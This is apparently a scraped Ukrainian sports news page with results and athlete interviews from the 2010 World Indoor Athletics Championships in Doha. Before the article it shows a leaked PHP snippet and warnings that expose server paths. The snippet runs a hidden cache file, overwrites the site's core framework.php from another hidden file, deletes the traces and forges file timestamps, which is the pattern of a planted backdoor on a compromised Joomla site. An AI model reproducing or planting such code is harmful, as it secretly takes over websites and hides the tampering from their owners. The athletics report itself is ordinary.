$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 426
Підсумки ЧЕМПІОНАТУ СВІТУ. ДОХА 2010. чоловіки | ФЕДЕРАЦІЯ ЛЕГКОЇ АТЛЕТИКИ УЖГОРОДА

 

 

Україна розділила 19-у позицію у
медальному заліку за підсумками
чемпіонату світу з легкої атлетики у закритих приміщеннях.

Медальний залік

1.США - 8 золотих, 3 срібних і 6 бронзових

2. Ефіопія - 3 + 0 + 2

3. Росія - 2 + 4 + 3

19. Україна - 0 + 1 + 0

Як виступили на цьому чемпіонаті наші  чоловіки і що вони про це говорять :

1. Для Дмитра Дем’янюка, котрий був лідером зимового сезону в Україні з показником 2м31см, змагання практично так і не розпочалися. Дмитро виконав лише одну невдалу спробу на позначці 218см і знявся зі змагань через травму.
«Це сталося ще на чемпіонаті України в Сумах. Я був вже трохи втомлений від сезону і в одній із останніх спроб намагався підняти себе потужним махом над планкою, але лише потягнув передню поверхню стегна. Увесь цей час ми намагалися не виконувати гострої технічної роботи, і все ніби то прийшло в норму. Щоправда, щойно поверталися до стрибків, нога починала про себе нагадувати болями. Втім, вчора на розминці нога не турбувала, щоправда, я намагався її берегти. Трохи по прискорювався, порозтягувався, але ризикувати не став. А сьогодні одразу в першому пробному стрибку – знову пекельний біль. Скажете, можна було б продовжувати зі сльозами на очах? Але кому потрібні вимучені стрибки, та й результат з них навряд чи вийде належний. Насправді, мені дуже шкода… стільки років поспіль як не одна травма, то інша…»2.Юрій Кримаренко
почав свої змагання з висоти 2.18, яку подолав, щоправда, з другої спроби. Потім з першої взяв 2м23см. На позначці 2.26 чемпіон світу 2005 року схибив двічі, але потім все ж таки подолав планку. Цю висоту подолали 10 учасників. Атлети вже перевзулися і зібрали речі, аби йти з сектора, одначе, судді вирішили інакше. Боротьба продовжилися на позначці 2м29см. Але бердичівському атлетові вона так і не підкорилася з трьох спроб, хоча в другій спробі він був дуже близьким, аби показати вдалий результат. Юрій залишився на дев’ятій позиції і не пройшов до фіналу. Ціна цього – лише одна невдала спроба в кваліфікаційних змаганнях. Від коментарів щодо свого виступу Юрій відмовився. Зрозуміти атлета можна, адже сім із восьми фіналістів потрапили до вирішальних змагань з результатом 2м26см

1 місце  - Іван Ухов                        2м36см   РОСІЯ
2місце  -  Ярослав Рибаков             2м31см   РОСІЯ
3 місце  -  Дасти Джонас                 2м31см  США

 

 

3. Максим Мазурик не здолав кваліфікаційний норматив у стрибках з жердиною .Ранком першого дня чемпіонату, взявши висоту 5м45см з другої спроби, він до фіналу не потрапив. До підняття планки до рівня встановленого кваліфікаційного нормативу (5м75см) справа в секторі не дійшла. Дев’ять легкоатлетів, на чолі з Олімпійським чемпіоном та чемпіоном світу Стівеном Хукером, взяли планку на позначці 5м60см і за загальною згодою всі дев’ять стартуватимуть у вирішальних змаганнях. І що з того, що до фіналу також не потрапили олімпійський чемпіон Афін американець Тімоті Мак, призер літнього чемпіонату світу француз Рено Лавільньє,  його співвітчизник Даміель Доссеві та бельгієць Кевін Ранс.
Про враження, а вірніше власні розчарування ранішніми стрибками Максим Мазурик розповів у мікст-зоні: «… Сьогодні я почувався значно ліпше. Після останніх ранкових стрибків ми зробили певні висновки, тому були готові змагатися так рано. Однак, сьогодні у мене щось не заладилося з ритмом розбігу, а самі стрибки були досить непоганими.»
1 місце  - Стів Хукер                 601 см         Австралія
2 місце  - Мальт Мохр                570 см         Німеччина
3 місце  -Олександр Штрауб      565см          Німеччина


4.
Андрій Макарчев. Став першим українцем, котрий пробився до фіналу чемпіонату світу в технічних видах. В першій спробі Андрій показав результат 7м81см. В другій – 7.88, і хоч він і не виконав кваліфікаційний норматив 8м00см,саме з цим показником посів п’яту позицію в своїй групі й восьму серед усіх стрибунів у довжину.
У фіналі  Макарчев стрибнув на 7.65 метрів і виборов 8 місце.

1. Фабріс Лапьєр (Австралія) - 8.17
2.  Годфрей Котсо Мокоена (ПАР) – 8м08см

3.     Мітчел Ватт (Австралія) -8м05см
...8. Андрій Макарчев (Україна) - 7.65
«Мені залишається тільки вибачитися перед вболівальниками і тренером, що сьогоднішній фінал у моєму виконанні був таким бездарним.  Відчуття в ногах було настільки важким, що, здавалося, мені час звернутися за сторонньою допомогою, аби їх переставляти. Таке враження, ніби на вчорашній кваліфікації я вижав себе, неначе лимон. Хоча вчора після старту ми зробили відновлювальний масаж. Сон був чудовий. Здавалося б, ніщо не могло завадити… Але де там… Я вже давненько таких результатів не показував. Кілька тижнів тому, навіть на тренуванні, з укороченого розбігу я стрибав по 8 метрів. Так що про якісь недоліки в підготовці тут мова не йде. Потрібно шукати інші причини. Втім, для мене це неоціненний досвід. В Досі я вперше виступав у фіналі чемпіонату світу. Тепер будемо готуватися далі. Життя ж на цьому не закінчується…»


5. Віктор Кузнєцов, котрий стрибав у іншому потоці цьому потоці показав у другій спробі 7м66см. (7.64 – у першій, 7.28 – у третій). У підсумку, в групі А Віктор посів восьму позицію, але цього не вистачило для виходу в фінал.
Досить емоційним було висловлювання Віктора :«Якщо вже у будемо аналізувати, то давайте почнемо здалеку», - почав атаку традиційно стриманий Кузнєцов. – «Перед чемпіонатом світу нам навіть не зробили жодного збору. Говоритиму на чистоту. Моєї зарплатні не вистачає для того, щоб прохарчуватися протягом місяця. Говорити про додаткові вітаміни і відновлювальні препарати взагалі сенсу нема. Їх купувати просто ні за що. Вже за тиждень до чемпіонату світу я позичав гроші у тренера, аби не сидіти на голодному паю. Це вже почало впливати потроху на настрій. Далі – ще краще. Переліт з Києва в Доху, який може тривати 5, ну максимум 6 годин для нашої команди обійшовся в цілу добу. Після 24 годин дороги, повірте, спати хочеться до цього часу. Особисто я сплю вночі, зранку, після обіду.  Ноги ватні. Намагаєшся проштовхнутися, «видавити» з себе щось, а дарма… Виходить ще гірше. Найдивніше те, що вся команда в такому стані. Хтозна, можливо, сьогодні на третій день перебування в Катарі ми просто потрапили в акліматизацію. Адже вдома все було гаразд, та й вчора на розминці, ніби потроху почали оживати після перельоту…А сьогодні, немов у яму потрапили. Прикро звісно, що вся підготовка осіння і зимова просто пропала через те, що керівництво не потурбувалося про зручні деталі перельоту. Та й, як на мне, організація могла б бути кращою. Манеж сам то красивий, але перетнути в одному місці стрибки з жердино, довжину і висоту – це занадто. Ми всі заважали один одному.»
Отже, винні всі, тільки не сам спортсмен. А, можливо, сам Віктор якось не так діяв, щось перемудрив. І, напевно, права Євгенія Снігур,
що « бійці безсонням не страждають». Я рахую, вони і СОНЛИВІСТЮ не страждають .Проснися , Вікторе. Але все це я б списав на емоції і біль невдалого виступу на основному старті року.


 

6. Віктор Ястребов срібний призер минулорічного чемпіонату Європи в закритих приміщеннях з потрійного стрибку у своїй найкращій третій спробі приземлився на позначці 16м53см. В першій броварчанин зробив заступ, у другій показав результат 16м28см.
Трьом учасникам залишалося виконати останню спробу, а Віктор все ще утримував восьму позицію, яка дозволяла б йому виступати у фіналі. Однак, словак Дмітрій Валюкєвіч обстрибав Ястребова рівно на 2 сантиметри, а потім і Ігор Спасовходський із Росії спромігся на стрибок на 16м57см. Ястребов зі своїм результатом залишився на десятій позиції, а отже за межами фіналу. «Звісно, прикро закінчити чемпіонат світу за два сантиметри до фіналу. Але це змагання… Мені сьогодні просто не вдалося зібрати стрибок. Більш того, я майже не відчував ніг і неймовірно втомився. Аналізувати будемо пізніше, але сподівання на краще у майбутньому мене не покидають».
Коментар головного тренера збірної України Олександра Апайчева : «Ястребову для попадання у фінал не вистачило 2 см.Двох!!!чому? Я вважаю,якщо ти не світовий лідер, який може собі дозволити  пройти відбірковий раунд граючись, то налаштовуватися на кваліфікацію ти повинен, як на останній бій, як на основні змагання».
1 місце  - Тедді Тамго                    17м90см        Франція  Світове досягнення
2 місце  -  Йоандрі Бетанзосом       17м69см         Куба
3 місце  - Арні Давід Хірат             17м36см         Куба
10 місце Віктор Ястребов         16м57см       УКРАїНА

 

7. Олексій Касьянов посів у дводенній боротьбі семиборців шосту позицію.

Останній вид чоловічого зимового семиборства – біг на 1000 метрів – український багатоборець закінчив другим з результатом 2:43.78сек., пропустивши попереду лише білоруса Андрєя Краучанку. Втім, піднятися бодай однією сходинкою вище Касьянову так і не вдалося. Набравши суму 6019 очок, Олексій фінішував шостим у загальному заліку. Легендарному чеху Роману Шебрлє запоріжанин поступився лише 5-ма очками.

1 місце- Брайян Клей   6204 очка
2 місце- Трей Харді      6184 очки
3 місце- Алєксєй Дроздов 6141 очко
…6 місце - Олексій Касьянов  6019 очок      Україна


«Після стрибків з жердиною у мене навіть виникло бажання не виходити на старт бігу на 1000 метрів, - говорить Касьянов одразу після фінішу. – Але потім вирішив, що потрібно не просто бігти, а ще й намагатися поборотися за те, щоб піднятися бодай однією сходинкою вище. Вже на останній вид я ставив собі завдання зробити все можливе, аби, по-перше, набрати більше 6000 очок, а по-друге, виграти у Романа Шебрлє. Хоча між нами було більше 40-ка очок, а на 1000 метрів відіграти їх дуже і дуже складно.

Те, що сталося в секторі для стрибків з жердиною, звісно, в основному пояснює твою невдачу на чемпіонаті. Але і вчора у вечірній програмі ти не виглядав «свіженьким» в секторах і для штовхання ядра, і для стрибків у висоту…

Це правда. Фізичний стан був жахливий. Перед вечірньою програмою на розминці я навіть кілька разів зупинявся, бо не міг навіть «потрусити». Відверто кажучи, не знаю, що могло так позначитися на фізичних кондиціях. Чи то важкий переліт, чи шалений перепад температур. Чи мої власні біоритми… Знаєте, мені показували мої біоритми на вчора і сьогодні, так вчора вони складали мінус 100, а сьогодні – мінус 97. Я хоча в них і не дуже вірю, але цей фактор також не можна відкидати…»

 

Написав Анатолій Коломоєць

 

 
ГОЛОВНА НОВИНИ новини Підсумки ЧЕМПІОНАТУ СВІТУ. ДОХА 2010. чоловіки
'Flauz' интернет магазин спортивного питания